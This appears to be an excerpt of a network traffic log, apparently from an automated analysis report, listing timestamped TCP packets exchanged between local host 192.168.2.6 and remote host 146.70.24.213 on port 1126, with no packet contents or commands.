Oct 12, 2024 20:30:06.617245913 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.617728949 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.617750883 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.617769003 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.617815018 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.617865086 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.617882013 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.617897987 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.617904902 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.617914915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.617938995 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.620723963 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.620779991 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.620784044 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.620815992 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.620868921 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.620887041 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.620903015 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.620939970 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.620975018 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.620984077 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.621037960 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.621968031 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.622106075 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.622139931 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.622164011 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.622174025 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.622226954 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.622261047 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.622275114 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.622298956 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.622334003 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.622335911 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.622366905 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.622383118 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.622400999 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.622433901 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.622443914 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.622467041 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.622500896 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.622534037 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.622564077 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.622566938 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.622596025 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.622601032 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.622634888 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.622661114 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.622669935 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.622704983 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.622718096 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.622755051 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.622787952 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.622823000 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.622838020 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.622864962 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.623455048 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.623655081 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.623687983 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.623709917 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.623722076 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.623754978 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.623769999 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.623788118 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.623821020 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.623841047 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.623853922 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.623886108 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.623908043 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.623919964 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.623954058 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.623975992 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.623986959 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624039888 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624042988 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.624095917 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624149084 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624152899 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.624183893 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624217033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624248981 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624267101 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.624283075 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624308109 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.624315977 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624350071 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624383926 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624398947 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.624417067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624429941 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.624450922 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624483109 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624504089 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.624516964 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624550104 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624564886 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.624583006 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624619961 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624631882 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.624674082 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624725103 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624732018 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.624758959 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624795914 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624829054 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624842882 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.624861956 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624876976 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.624895096 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624927044 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624954939 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.624958992 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.624991894 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.625005960 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.625041962 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.625076056 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.625089884 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.625111103 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.625140905 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.625174999 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.625185966 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.625207901 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.625217915 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.625241995 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.625276089 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.625308990 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.625322104 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.625343084 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.625354052 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.625377893 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.625406981 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.625478029 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.625857115 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.625911951 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.625921965 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.625965118 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.625998974 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.626019955 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.626055956 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.626091003 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.626121998 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.626123905 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.626157999 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.626163960 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.626209974 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.626245022 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.626266956 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.626276970 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.626312017 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.626332998 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.626342058 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.626378059 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.626406908 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.626873016 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.626930952 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.626986027 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.627017021 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.627048969 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.627064943 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.627079010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.627108097 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.627137899 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.627152920 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.627166986 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.627192974 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.666275024 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.666325092 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.666347980 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.666366100 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.666409016 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.666436911 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.666446924 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.666481018 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.666493893 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.666518927 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.666569948 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.710350990 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.710375071 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.710392952 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.710410118 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.710426092 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.710433960 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.710442066 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.710449934 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.710458994 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.710474968 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.710509062 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.710536003 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.713485956 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.713541031 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.713594913 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.713629007 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.713659048 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.713663101 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.713696003 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.713706970 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.713731050 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.713738918 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.714432001 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.714482069 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.714483976 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.714518070 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.714551926 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.714576960 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.714606047 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.714639902 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.714690924 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.714693069 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.714725971 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.714740992 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.714760065 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.714796066 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.714806080 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.714831114 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.714864016 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.714886904 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.714915991 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.714948893 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.714982033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.714997053 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.715034962 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.715042114 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.715080976 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.715131998 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.715167046 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.715178967 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.715199947 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.715212107 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.715233088 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.715266943 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.715312958 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.716007948 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716038942 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716053009 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.716093063 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716126919 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716172934 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.716176033 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716227055 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716234922 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.716260910 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716296911 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716346025 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.716346025 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716397047 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716412067 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.716445923 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716495037 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.716497898 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716547966 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716583967 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716612101 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.716634989 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716670036 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716697931 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.716697931 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716731071 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716763020 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716778994 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.716794968 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716810942 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.716828108 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716859102 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716885090 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.716892004 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716922998 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716955900 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.716978073 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.716988087 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717012882 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.717020988 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717053890 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717087030 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717097998 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.717119932 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717135906 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.717154026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717185020 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717194080 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.717216969 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717268944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717302084 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717310905 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.717334032 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717344046 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.717366934 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717418909 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717453957 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717483044 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.717485905 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717509031 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.717519045 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717547894 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717581034 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717600107 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.717616081 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717628002 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.717648983 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717681885 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717693090 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.717714071 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717749119 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717781067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717794895 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.717814922 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717827082 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.717849970 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717884064 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717916965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717931032 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.717950106 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.717969894 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.718565941 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.718626022 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.718640089 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.718676090 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.718712091 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.718724012 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.718760014 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.718792915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.718810081 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.718826056 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.718858957 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.718904972 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:06.718908072 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.718940973 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:06.718971968 CEST	1126	49710	146.70.24.213	192.168.2.6
